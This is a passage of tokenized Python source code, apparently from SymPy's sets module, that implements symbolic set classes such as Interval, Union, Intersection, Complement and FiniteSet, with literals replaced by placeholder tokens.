self . args [ <NUM_LIT:1> : ] ) , <EOL> ProductSet ( other . 
args [ <NUM_LIT:1> : ] ) ) <EOL> if self . args [ - <NUM_LIT:1> ] == other . args [ - <NUM_LIT:1> ] : <EOL> return Union ( ProductSet ( self . args [ : - <NUM_LIT:1> ] ) , <EOL> ProductSet ( other . args [ : - <NUM_LIT:1> ] ) ) * self . args [ - <NUM_LIT:1> ] <EOL> return None <EOL> @ property <EOL> def sets ( self ) : <EOL> return self . args <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return Union ( ProductSet ( b + b . boundary if i != j else b . boundary <EOL> for j , b in enumerate ( self . sets ) ) <EOL> for i , a in enumerate ( self . sets ) ) <EOL> @ property <EOL> def is_iterable ( self ) : <EOL> return all ( set . is_iterable for set in self . sets ) <EOL> def __iter__ ( self ) : <EOL> if self . is_iterable : <EOL> return product ( * self . sets ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> measure = <NUM_LIT:1> <EOL> for set in self . sets : <EOL> measure *= set . measure <EOL> return measure <EOL> def __len__ ( self ) : <EOL> return Mul ( * [ len ( s ) for s in self . args ] ) <EOL> class Interval ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_Interval = True <EOL> def __new__ ( cls , start , end , left_open = False , right_open = False ) : <EOL> start = _sympify ( start ) <EOL> end = _sympify ( end ) <EOL> left_open = _sympify ( left_open ) <EOL> right_open = _sympify ( right_open ) <EOL> if not all ( isinstance ( a , ( type ( true ) , type ( false ) ) ) <EOL> for a in [ left_open , right_open ] ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( left_open , right_open ) ) <EOL> inftys = [ S . Infinity , S . NegativeInfinity ] <EOL> if not all ( i . is_real is not False or i in inftys for i in ( start , end ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if ( end < start ) == True : <EOL> return S . EmptySet <EOL> elif ( end - start ) . is_negative : <EOL> return S . EmptySet <EOL> if end == start and ( left_open or right_open ) : <EOL> return S . 
EmptySet <EOL> if end == start and not ( left_open or right_open ) : <EOL> return FiniteSet ( end ) <EOL> if start == S . NegativeInfinity : <EOL> left_open = true <EOL> if end == S . Infinity : <EOL> right_open = true <EOL> return Basic . __new__ ( cls , start , end , left_open , right_open ) <EOL> @ property <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:0> ] <EOL> _inf = left = start <EOL> @ classmethod <EOL> def open ( cls , a , b ) : <EOL> """<STR_LIT>""" <EOL> return cls ( a , b , True , True ) <EOL> @ classmethod <EOL> def Lopen ( cls , a , b ) : <EOL> """<STR_LIT>""" <EOL> return cls ( a , b , True , False ) <EOL> @ classmethod <EOL> def Ropen ( cls , a , b ) : <EOL> """<STR_LIT>""" <EOL> return cls ( a , b , False , True ) <EOL> @ property <EOL> def end ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:1> ] <EOL> _sup = right = end <EOL> @ property <EOL> def left_open ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:2> ] <EOL> @ property <EOL> def right_open ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:3> ] <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not other . is_Interval : <EOL> return None <EOL> infty = S . NegativeInfinity , S . Infinity <EOL> if self == Interval ( * infty ) : <EOL> l , r = self . left , self . right <EOL> if l . is_real or l in infty or r . is_real or r in infty : <EOL> return other <EOL> if not self . _is_comparable ( other ) : <EOL> return None <EOL> empty = False <EOL> if self . start <= other . end and other . start <= self . end : <EOL> if self . start < other . start : <EOL> start = other . start <EOL> left_open = other . left_open <EOL> elif self . start > other . start : <EOL> start = self . start <EOL> left_open = self . left_open <EOL> else : <EOL> start = self . start <EOL> left_open = self . left_open or other . left_open <EOL> if self . end < other . end : <EOL> end = self . 
end <EOL> right_open = self . right_open <EOL> elif self . end > other . end : <EOL> end = other . end <EOL> right_open = other . right_open <EOL> else : <EOL> end = self . end <EOL> right_open = self . right_open or other . right_open <EOL> if end - start == <NUM_LIT:0> and ( left_open or right_open ) : <EOL> empty = True <EOL> else : <EOL> empty = True <EOL> if empty : <EOL> return S . EmptySet <EOL> return Interval ( start , end , left_open , right_open ) <EOL> def _complement ( self , other ) : <EOL> if other == S . Reals : <EOL> a = Interval ( S . NegativeInfinity , self . start , <EOL> True , not self . left_open ) <EOL> b = Interval ( self . end , S . Infinity , not self . right_open , True ) <EOL> return Union ( a , b ) <EOL> if isinstance ( other , FiniteSet ) : <EOL> nums = [ m for m in other . args if m . is_number ] <EOL> if nums == [ ] : <EOL> return None <EOL> return Set . _complement ( self , other ) <EOL> def _union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . is_Interval and self . _is_comparable ( other ) : <EOL> from sympy . functions . elementary . miscellaneous import Min , Max <EOL> end = Min ( self . end , other . end ) <EOL> start = Max ( self . start , other . start ) <EOL> if ( end < start or <EOL> ( end == start and ( end not in self and end not in other ) ) ) : <EOL> return None <EOL> else : <EOL> start = Min ( self . start , other . start ) <EOL> end = Max ( self . end , other . end ) <EOL> left_open = ( ( self . start != start or self . left_open ) and <EOL> ( other . start != start or other . left_open ) ) <EOL> right_open = ( ( self . end != end or self . right_open ) and <EOL> ( other . end != end or other . right_open ) ) <EOL> return Interval ( start , end , left_open , right_open ) <EOL> if ( ( self . left_open and sympify ( other . contains ( self . start ) ) is S . true ) or <EOL> ( self . right_open and sympify ( other . contains ( self . end ) ) is S . true ) ) : <EOL> open_left = self . left_open and self . 
start not in other <EOL> open_right = self . right_open and self . end not in other <EOL> new_self = Interval ( self . start , self . end , open_left , open_right ) <EOL> return set ( ( new_self , other ) ) <EOL> return None <EOL> @ property <EOL> def _boundary ( self ) : <EOL> finite_points = [ p for p in ( self . start , self . end ) <EOL> if abs ( p ) != S . Infinity ] <EOL> return FiniteSet ( * finite_points ) <EOL> def _contains ( self , other ) : <EOL> if not isinstance ( other , Expr ) or ( <EOL> other is S . Infinity or <EOL> other is S . NegativeInfinity or <EOL> other is S . NaN or <EOL> other is S . ComplexInfinity ) or other . is_real is False : <EOL> return false <EOL> if self . start is S . NegativeInfinity and self . end is S . Infinity : <EOL> if not other . is_real is None : <EOL> return other . is_real <EOL> if self . left_open : <EOL> expr = other > self . start <EOL> else : <EOL> expr = other >= self . start <EOL> if self . right_open : <EOL> expr = And ( expr , other < self . end ) <EOL> else : <EOL> expr = And ( expr , other <= self . end ) <EOL> return _sympify ( expr ) <EOL> def _eval_imageset ( self , f ) : <EOL> from sympy . functions . elementary . miscellaneous import Min , Max <EOL> from sympy . solvers . solveset import solveset <EOL> from sympy . core . function import diff , Lambda <EOL> from sympy . series import limit <EOL> from sympy . calculus . singularities import singularities <EOL> expr = f . expr <EOL> if len ( expr . free_symbols ) > <NUM_LIT:1> or len ( f . variables ) != <NUM_LIT:1> : <EOL> return <EOL> var = f . variables [ <NUM_LIT:0> ] <EOL> if expr . is_Piecewise : <EOL> result = S . EmptySet <EOL> domain_set = self <EOL> for ( p_expr , p_cond ) in expr . args : <EOL> if p_cond is true : <EOL> intrvl = domain_set <EOL> else : <EOL> intrvl = p_cond . as_set ( ) <EOL> intrvl = Intersection ( domain_set , intrvl ) <EOL> if p_expr . 
is_Number : <EOL> image = FiniteSet ( p_expr ) <EOL> else : <EOL> image = imageset ( Lambda ( var , p_expr ) , intrvl ) <EOL> result = Union ( result , image ) <EOL> domain_set = Complement ( domain_set , intrvl ) <EOL> if domain_set . is_EmptySet : <EOL> break <EOL> return result <EOL> if not self . start . is_comparable or not self . end . is_comparable : <EOL> return <EOL> try : <EOL> sing = [ x for x in singularities ( expr , var ) <EOL> if x . is_real and x in self ] <EOL> except NotImplementedError : <EOL> return <EOL> if self . left_open : <EOL> _start = limit ( expr , var , self . start , dir = "<STR_LIT:+>" ) <EOL> elif self . start not in sing : <EOL> _start = f ( self . start ) <EOL> if self . right_open : <EOL> _end = limit ( expr , var , self . end , dir = "<STR_LIT:->" ) <EOL> elif self . end not in sing : <EOL> _end = f ( self . end ) <EOL> if len ( sing ) == <NUM_LIT:0> : <EOL> solns = list ( solveset ( diff ( expr , var ) , var ) ) <EOL> extr = [ _start , _end ] + [ f ( x ) for x in solns <EOL> if x . is_real and x in self ] <EOL> start , end = Min ( * extr ) , Max ( * extr ) <EOL> left_open , right_open = False , False <EOL> if _start <= _end : <EOL> if start == _start and start not in solns : <EOL> left_open = self . left_open <EOL> if end == _end and end not in solns : <EOL> right_open = self . right_open <EOL> else : <EOL> if start == _end and start not in solns : <EOL> left_open = self . right_open <EOL> if end == _start and end not in solns : <EOL> right_open = self . left_open <EOL> return Interval ( start , end , left_open , right_open ) <EOL> else : <EOL> return imageset ( f , Interval ( self . start , sing [ <NUM_LIT:0> ] , <EOL> self . left_open , True ) ) + Union ( * [ imageset ( f , Interval ( sing [ i ] , sing [ i + <NUM_LIT:1> ] , True , True ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( sing ) - <NUM_LIT:1> ) ] ) + imageset ( f , Interval ( sing [ - <NUM_LIT:1> ] , self . end , True , self . 
right_open ) ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> return self . end - self . start <EOL> def to_mpi ( self , prec = <NUM_LIT> ) : <EOL> return mpi ( mpf ( self . start . _eval_evalf ( prec ) ) , <EOL> mpf ( self . end . _eval_evalf ( prec ) ) ) <EOL> def _eval_evalf ( self , prec ) : <EOL> return Interval ( self . left . _eval_evalf ( prec ) , <EOL> self . right . _eval_evalf ( prec ) , <EOL> left_open = self . left_open , right_open = self . right_open ) <EOL> def _is_comparable ( self , other ) : <EOL> is_comparable = self . start . is_comparable <EOL> is_comparable &= self . end . is_comparable <EOL> is_comparable &= other . start . is_comparable <EOL> is_comparable &= other . end . is_comparable <EOL> return is_comparable <EOL> @ property <EOL> def is_left_unbounded ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . left is S . NegativeInfinity or self . left == Float ( "<STR_LIT>" ) <EOL> @ property <EOL> def is_right_unbounded ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . right is S . Infinity or self . right == Float ( "<STR_LIT>" ) <EOL> def as_relational ( self , x ) : <EOL> """<STR_LIT>""" <EOL> x = sympify ( x ) <EOL> if self . right_open : <EOL> right = x < self . end <EOL> else : <EOL> right = x <= self . end <EOL> if self . left_open : <EOL> left = self . start < x <EOL> else : <EOL> left = self . start <= x <EOL> return And ( left , right ) <EOL> def _eval_Eq ( self , other ) : <EOL> if not other . is_Interval : <EOL> if ( other . is_Union or other . is_Complement or <EOL> other . is_Intersection or other . is_ProductSet ) : <EOL> return <EOL> return false <EOL> return And ( Eq ( self . left , other . left ) , <EOL> Eq ( self . right , other . right ) , <EOL> self . left_open == other . left_open , <EOL> self . right_open == other . right_open ) <EOL> class Union ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_Union = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> evaluate = kwargs . 
get ( '<STR_LIT>' , global_evaluate [ <NUM_LIT:0> ] ) <EOL> args = list ( args ) <EOL> def flatten ( arg ) : <EOL> if isinstance ( arg , Set ) : <EOL> if arg . is_Union : <EOL> return sum ( map ( flatten , arg . args ) , [ ] ) <EOL> else : <EOL> return [ arg ] <EOL> if iterable ( arg ) : <EOL> return sum ( map ( flatten , arg ) , [ ] ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> args = flatten ( args ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> return S . EmptySet <EOL> if evaluate : <EOL> return Union . reduce ( args ) <EOL> args = list ( ordered ( args , Set . _infimum_key ) ) <EOL> return Basic . __new__ ( cls , * args ) <EOL> @ staticmethod <EOL> def reduce ( args ) : <EOL> """<STR_LIT>""" <EOL> finite_sets = [ x for x in args if x . is_FiniteSet ] <EOL> if len ( finite_sets ) > <NUM_LIT:1> : <EOL> a = ( x for set in finite_sets for x in set ) <EOL> finite_set = FiniteSet ( * a ) <EOL> args = [ finite_set ] + [ x for x in args if not x . is_FiniteSet ] <EOL> args = set ( args ) <EOL> new_args = True <EOL> while ( new_args ) : <EOL> for s in args : <EOL> new_args = False <EOL> for t in args - set ( ( s , ) ) : <EOL> new_set = s . _union ( t ) <EOL> if new_set is not None : <EOL> if not isinstance ( new_set , set ) : <EOL> new_set = set ( ( new_set , ) ) <EOL> new_args = ( args - set ( ( s , t ) ) ) . union ( new_set ) <EOL> break <EOL> if new_args : <EOL> args = new_args <EOL> break <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return args . pop ( ) <EOL> else : <EOL> return Union ( args , evaluate = False ) <EOL> def _complement ( self , universe ) : <EOL> return Intersection ( s . complement ( universe ) for s in self . args ) <EOL> @ property <EOL> def _inf ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Min <EOL> return Min ( * [ set . inf for set in self . args ] ) <EOL> @ property <EOL> def _sup ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Max <EOL> return Max ( * [ set . sup for set in self . 
args ] ) <EOL> def _contains ( self , other ) : <EOL> return Or ( * [ set . contains ( other ) for set in self . args ] ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> sets = [ ( FiniteSet ( s ) , s ) for s in self . args ] <EOL> measure = <NUM_LIT:0> <EOL> parity = <NUM_LIT:1> <EOL> while sets : <EOL> measure += parity * sum ( inter . measure for sos , inter in sets ) <EOL> sets = ( ( sos + FiniteSet ( newset ) , newset . intersect ( intersection ) ) <EOL> for sos , intersection in sets for newset in self . args <EOL> if newset not in sos ) <EOL> sets = [ ( sos , inter ) for sos , inter in sets if inter . measure != <NUM_LIT:0> ] <EOL> sos_list = [ ] <EOL> sets_list = [ ] <EOL> for set in sets : <EOL> if set [ <NUM_LIT:0> ] in sos_list : <EOL> continue <EOL> else : <EOL> sos_list . append ( set [ <NUM_LIT:0> ] ) <EOL> sets_list . append ( set ) <EOL> sets = sets_list <EOL> parity *= - <NUM_LIT:1> <EOL> return measure <EOL> @ property <EOL> def _boundary ( self ) : <EOL> def boundary_of_set ( i ) : <EOL> """<STR_LIT>""" <EOL> b = self . args [ i ] . boundary <EOL> for j , a in enumerate ( self . args ) : <EOL> if j != i : <EOL> b = b - a . interior <EOL> return b <EOL> return Union ( map ( boundary_of_set , range ( len ( self . args ) ) ) ) <EOL> def _eval_imageset ( self , f ) : <EOL> return Union ( imageset ( f , arg ) for arg in self . args ) <EOL> def as_relational ( self , symbol ) : <EOL> """<STR_LIT>""" <EOL> return Or ( * [ set . as_relational ( symbol ) for set in self . args ] ) <EOL> @ property <EOL> def is_iterable ( self ) : <EOL> return all ( arg . is_iterable for arg in self . args ) <EOL> def _eval_evalf ( self , prec ) : <EOL> try : <EOL> return Union ( set . _eval_evalf ( prec ) for set in self . 
args ) <EOL> except Exception : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> def __iter__ ( self ) : <EOL> import itertools <EOL> def roundrobin ( * iterables ) : <EOL> "<STR_LIT>" <EOL> pending = len ( iterables ) <EOL> if PY3 : <EOL> nexts = itertools . cycle ( iter ( it ) . __next__ for it in iterables ) <EOL> else : <EOL> nexts = itertools . cycle ( iter ( it ) . next for it in iterables ) <EOL> while pending : <EOL> try : <EOL> for next in nexts : <EOL> yield next ( ) <EOL> except StopIteration : <EOL> pending -= <NUM_LIT:1> <EOL> nexts = itertools . cycle ( itertools . islice ( nexts , pending ) ) <EOL> if all ( set . is_iterable for set in self . args ) : <EOL> return roundrobin ( * ( iter ( arg ) for arg in self . args ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> class Intersection ( Set ) : <EOL> """<STR_LIT>""" <EOL> is_Intersection = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> evaluate = kwargs . get ( '<STR_LIT>' , global_evaluate [ <NUM_LIT:0> ] ) <EOL> args = list ( args ) <EOL> def flatten ( arg ) : <EOL> if isinstance ( arg , Set ) : <EOL> if arg . is_Intersection : <EOL> return sum ( map ( flatten , arg . args ) , [ ] ) <EOL> else : <EOL> return [ arg ] <EOL> if iterable ( arg ) : <EOL> return sum ( map ( flatten , arg ) , [ ] ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> args = flatten ( args ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> return S . EmptySet <EOL> if '<STR_LIT>' not in [ type ( a ) . __name__ for a in args ] : <EOL> args = list ( ordered ( args , Set . _infimum_key ) ) <EOL> if evaluate : <EOL> return Intersection . reduce ( args ) <EOL> return Basic . __new__ ( cls , * args ) <EOL> @ property <EOL> def is_iterable ( self ) : <EOL> return any ( arg . is_iterable for arg in self . 
args ) <EOL> @ property <EOL> def _inf ( self ) : <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def _sup ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def _eval_imageset ( self , f ) : <EOL> return Intersection ( imageset ( f , arg ) for arg in self . args ) <EOL> def _contains ( self , other ) : <EOL> return And ( * [ set . contains ( other ) for set in self . args ] ) <EOL> def __iter__ ( self ) : <EOL> no_iter = True <EOL> for s in self . args : <EOL> if s . is_iterable : <EOL> no_iter = False <EOL> other_sets = set ( self . args ) - set ( ( s , ) ) <EOL> other = Intersection ( other_sets , evaluate = False ) <EOL> for x in s : <EOL> c = sympify ( other . contains ( x ) ) <EOL> if c is S . true : <EOL> yield x <EOL> elif c is S . false : <EOL> pass <EOL> else : <EOL> yield c <EOL> if no_iter : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def _handle_finite_sets ( args ) : <EOL> from sympy . core . logic import fuzzy_and , fuzzy_bool <EOL> from sympy . core . compatibility import zip_longest <EOL> from sympy . utilities . iterables import sift <EOL> sifted = sift ( args , lambda x : x . is_FiniteSet ) <EOL> fs_args = sifted . pop ( True , [ ] ) <EOL> if not fs_args : <EOL> return <EOL> s = fs_args [ <NUM_LIT:0> ] <EOL> fs_args = fs_args [ <NUM_LIT:1> : ] <EOL> other = sifted . pop ( False , [ ] ) <EOL> res = [ ] <EOL> unk = [ ] <EOL> for x in s : <EOL> c = fuzzy_and ( fuzzy_bool ( o . contains ( x ) ) <EOL> for o in fs_args + other ) <EOL> if c : <EOL> res . append ( x ) <EOL> elif c is None : <EOL> unk . append ( x ) <EOL> else : <EOL> pass <EOL> res = FiniteSet ( <EOL> * res , evaluate = False ) if res else S . EmptySet <EOL> if unk : <EOL> symbolic_s_list = [ x for x in s if x . has ( Symbol ) ] <EOL> non_symbolic_s = s - FiniteSet ( <EOL> * symbolic_s_list , evaluate = False ) <EOL> while fs_args : <EOL> v = fs_args . 
pop ( ) <EOL> if all ( i == j for i , j in zip_longest ( <EOL> symbolic_s_list , <EOL> ( x for x in v if x . has ( Symbol ) ) ) ) : <EOL> for x in non_symbolic_s : <EOL> if x in unk : <EOL> unk . remove ( x ) <EOL> else : <EOL> contained = [ x for x in symbolic_s_list <EOL> if sympify ( v . contains ( x ) ) is S . true ] <EOL> if contained != symbolic_s_list : <EOL> other . append ( <EOL> v - FiniteSet ( <EOL> * contained , evaluate = False ) ) <EOL> else : <EOL> pass <EOL> other_sets = Intersection ( * other ) <EOL> if not other_sets : <EOL> return S . EmptySet <EOL> res += Intersection ( <EOL> FiniteSet ( * unk ) , <EOL> other_sets , evaluate = False ) <EOL> return res <EOL> @ staticmethod <EOL> def reduce ( args ) : <EOL> """<STR_LIT>""" <EOL> from sympy . simplify . simplify import clear_coefficients <EOL> if any ( s . is_EmptySet for s in args ) : <EOL> return S . EmptySet <EOL> rv = Intersection . _handle_finite_sets ( args ) <EOL> if rv is not None : <EOL> if isinstance ( rv , Intersection ) and len ( rv . args ) == <NUM_LIT:2> : <EOL> ivl , s = rv . args <EOL> if isinstance ( s , FiniteSet ) and len ( s ) == <NUM_LIT:1> and isinstance ( ivl , Interval ) : <EOL> e = list ( s ) [ <NUM_LIT:0> ] <EOL> if e . free_symbols : <EOL> rhs = Dummy ( ) <EOL> e , r = clear_coefficients ( e , rhs ) <EOL> if r != rhs : <EOL> iargs = list ( ivl . args ) <EOL> iargs [ <NUM_LIT:0> ] = r . subs ( rhs , ivl . start ) <EOL> iargs [ <NUM_LIT:1> ] = r . subs ( rhs , ivl . end ) <EOL> if iargs [ <NUM_LIT:0> ] > iargs [ <NUM_LIT:1> ] : <EOL> iargs = iargs [ : <NUM_LIT:2> ] [ : : - <NUM_LIT:1> ] + iargs [ - <NUM_LIT:2> : ] [ : : - <NUM_LIT:1> ] <EOL> rv = Intersection ( FiniteSet ( e ) , Interval ( * iargs ) , evaluate = False ) <EOL> return rv <EOL> for s in args : <EOL> if s . 
is_Union : <EOL> other_sets = set ( args ) - set ( ( s , ) ) <EOL> if len ( other_sets ) > <NUM_LIT:0> : <EOL> other = Intersection ( other_sets ) <EOL> return Union ( Intersection ( arg , other ) for arg in s . args ) <EOL> else : <EOL> return Union ( arg for arg in s . args ) <EOL> for s in args : <EOL> if s . is_Complement : <EOL> args . remove ( s ) <EOL> other_sets = args + [ s . args [ <NUM_LIT:0> ] ] <EOL> return Complement ( Intersection ( * other_sets ) , s . args [ <NUM_LIT:1> ] ) <EOL> args = set ( args ) <EOL> new_args = True <EOL> while ( new_args ) : <EOL> for s in args : <EOL> new_args = False <EOL> for t in args - set ( ( s , ) ) : <EOL> new_set = s . _intersect ( t ) <EOL> if new_set is not None : <EOL> new_args = ( args - set ( ( s , t ) ) ) . union ( set ( ( new_set , ) ) ) <EOL> break <EOL> if new_args : <EOL> args = new_args <EOL> break <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return args . pop ( ) <EOL> else : <EOL> return Intersection ( args , evaluate = False ) <EOL> def as_relational ( self , symbol ) : <EOL> """<STR_LIT>""" <EOL> return And ( * [ set . as_relational ( symbol ) for set in self . args ] ) <EOL> class Complement ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_Complement = True <EOL> def __new__ ( cls , a , b , evaluate = True ) : <EOL> if evaluate : <EOL> return Complement . reduce ( a , b ) <EOL> return Basic . __new__ ( cls , a , b ) <EOL> @ staticmethod <EOL> def reduce ( A , B ) : <EOL> """<STR_LIT>""" <EOL> if B == S . UniversalSet or A . is_subset ( B ) : <EOL> return EmptySet ( ) <EOL> if isinstance ( B , Union ) : <EOL> return Intersection ( s . complement ( A ) for s in B . args ) <EOL> result = B . _complement ( A ) <EOL> if result != None : <EOL> return result <EOL> else : <EOL> return Complement ( A , B , evaluate = False ) <EOL> def _contains ( self , other ) : <EOL> A = self . args [ <NUM_LIT:0> ] <EOL> B = self . args [ <NUM_LIT:1> ] <EOL> return And ( A . contains ( other ) , Not ( B . 
contains ( other ) ) ) <EOL> class EmptySet ( with_metaclass ( Singleton , Set ) ) : <EOL> """<STR_LIT>""" <EOL> is_EmptySet = True <EOL> is_FiniteSet = True <EOL> def _intersect ( self , other ) : <EOL> return S . EmptySet <EOL> @ property <EOL> def _measure ( self ) : <EOL> return <NUM_LIT:0> <EOL> def _contains ( self , other ) : <EOL> return false <EOL> def as_relational ( self , symbol ) : <EOL> return false <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:0> <EOL> def _union ( self , other ) : <EOL> return other <EOL> def __iter__ ( self ) : <EOL> return iter ( [ ] ) <EOL> def _eval_imageset ( self , f ) : <EOL> return self <EOL> def _eval_powerset ( self ) : <EOL> return FiniteSet ( self ) <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return self <EOL> def _complement ( self , other ) : <EOL> return other <EOL> def _symmetric_difference ( self , other ) : <EOL> return other <EOL> class UniversalSet ( with_metaclass ( Singleton , Set ) ) : <EOL> """<STR_LIT>""" <EOL> is_UniversalSet = True <EOL> def _intersect ( self , other ) : <EOL> return other <EOL> def _complement ( self , other ) : <EOL> return S . EmptySet <EOL> def _symmetric_difference ( self , other ) : <EOL> return other <EOL> @ property <EOL> def _measure ( self ) : <EOL> return S . Infinity <EOL> def _contains ( self , other ) : <EOL> return true <EOL> def as_relational ( self , symbol ) : <EOL> return true <EOL> def _union ( self , other ) : <EOL> return self <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return EmptySet ( ) <EOL> class FiniteSet ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_FiniteSet = True <EOL> is_iterable = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> evaluate = kwargs . 
get ( '<STR_LIT>' , global_evaluate [ <NUM_LIT:0> ] ) <EOL> if evaluate : <EOL> args = list ( map ( sympify , args ) ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> return EmptySet ( ) <EOL> else : <EOL> args = list ( map ( sympify , args ) ) <EOL> args = list ( ordered ( frozenset ( tuple ( args ) ) , Set . _infimum_key ) ) <EOL> obj = Basic . __new__ ( cls , * args ) <EOL> obj . _elements = frozenset ( args ) <EOL> return obj <EOL> def _eval_Eq ( self , other ) : <EOL> if not other . is_FiniteSet : <EOL> if ( other . is_Union or other . is_Complement or <EOL> other . is_Intersection or other . is_ProductSet ) : <EOL> return <EOL> return false <EOL> if len ( self ) != len ( other ) : <EOL> return false <EOL> return And ( * ( Eq ( x , y ) for x , y in zip ( self . args , other . args ) ) ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . args ) <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , self . __class__ ) : <EOL> return self . __class__ ( * ( self . _elements & other . _elements ) ) <EOL> return self . __class__ ( * [ el for el in self if el in other ] ) <EOL> def _complement ( self , other ) : <EOL> if isinstance ( other , Interval ) : <EOL> nums = sorted ( m for m in self . args if m . is_number ) <EOL> if other == S . Reals and nums != [ ] : <EOL> syms = [ m for m in self . args if m . is_Symbol ] <EOL> intervals = [ ] <EOL> intervals += [ Interval ( S . NegativeInfinity , nums [ <NUM_LIT:0> ] , True , True ) ] <EOL> for a , b in zip ( nums [ : - <NUM_LIT:1> ] , nums [ <NUM_LIT:1> : ] ) : <EOL> intervals . append ( Interval ( a , b , True , True ) ) <EOL> intervals . append ( Interval ( nums [ - <NUM_LIT:1> ] , S . 
Infinity , True , True ) ) <EOL> if syms != [ ] : <EOL> return Complement ( Union ( intervals , evaluate = False ) , <EOL> FiniteSet ( * syms ) , evaluate = False ) <EOL> else : <EOL> return Union ( intervals , evaluate = False ) <EOL> elif nums == [ ] : <EOL> return None <EOL> elif isinstance ( other , FiniteSet ) : <EOL> unk = [ ] <EOL> for i in self : <EOL> c = sympify ( other . contains ( i ) ) <EOL> if c is not S . true and c is not S . false : <EOL> unk . append ( i ) <EOL> unk = FiniteSet ( * unk ) <EOL> if unk == self : <EOL> return <EOL> not_true = [ ] <EOL> for i in other : <EOL> c = sympify ( self . contains ( i ) ) <EOL> if c is not S . true : <EOL> not_true . append ( i ) <EOL> return Complement ( FiniteSet ( * not_true ) , unk ) <EOL> return Set . _complement ( self , other ) <EOL> def _union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . is_FiniteSet : <EOL> return FiniteSet ( * ( self . _elements | other . _elements ) ) <EOL> if any ( sympify ( other . contains ( x ) ) is S . true for x in self ) : <EOL> return set ( ( <EOL> FiniteSet ( * [ x for x in self <EOL> if other . contains ( x ) != True ] ) , other ) ) <EOL> return None <EOL> def _contains ( self , other ) : <EOL> """<STR_LIT>""" <EOL> r = false <EOL> for e in self . _elements : <EOL> t = Eq ( e , other , evaluate = True ) <EOL> if isinstance ( t , Eq ) : <EOL> t = t . simplify ( ) <EOL> if t == true : <EOL> return t <EOL> elif t != false : <EOL> r = None <EOL> return r <EOL> def _eval_imageset ( self , f ) : <EOL> return FiniteSet ( * map ( f , self ) ) <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return self <EOL> @ property <EOL> def _inf ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Min <EOL> return Min ( * self ) <EOL> @ property <EOL> def _sup ( self ) : <EOL> from sympy . functions . elementary . 
miscellaneous import Max <EOL> return Max ( * self ) <EOL> @ property <EOL> def measure ( self ) : <EOL> return <NUM_LIT:0> <EOL> def __len__ ( self ) : <EOL> return len ( self . args ) <EOL> def as_relational ( self , symbol ) : <EOL> """<STR_LIT>""" <EOL> from sympy . core . relational import Eq <EOL> return Or ( * [ Eq ( symbol , elem ) for elem in self ] ) <EOL> def compare ( self , other ) : <EOL> return ( hash ( self ) - hash ( other ) ) <EOL> def _eval_evalf ( self , prec ) : <EOL> return FiniteSet ( * [ elem . _eval_evalf ( prec ) for elem in self ] ) <EOL> def _hashable_content ( self ) : <EOL> return ( self . _elements , ) <EOL> @ property <EOL> def _sorted_args ( self ) : <EOL> return tuple ( ordered ( self . args , Set . _infimum_key ) ) <EOL> def _eval_powerset ( self ) : <EOL> return self . func ( * [ self . func ( * s ) for s in subsets ( self . args ) ] ) <EOL> def __ge__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return other . is_subset ( self ) <EOL> def __gt__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return self . is_proper_superset ( other ) <EOL> def __le__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return self . is_subset ( other ) <EOL> def __lt__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return self . is_proper_subset ( other ) <EOL> converter [ set ] = lambda x : FiniteSet ( * x ) <EOL> converter [ frozenset ] = lambda x : FiniteSet ( * x ) <EOL> class 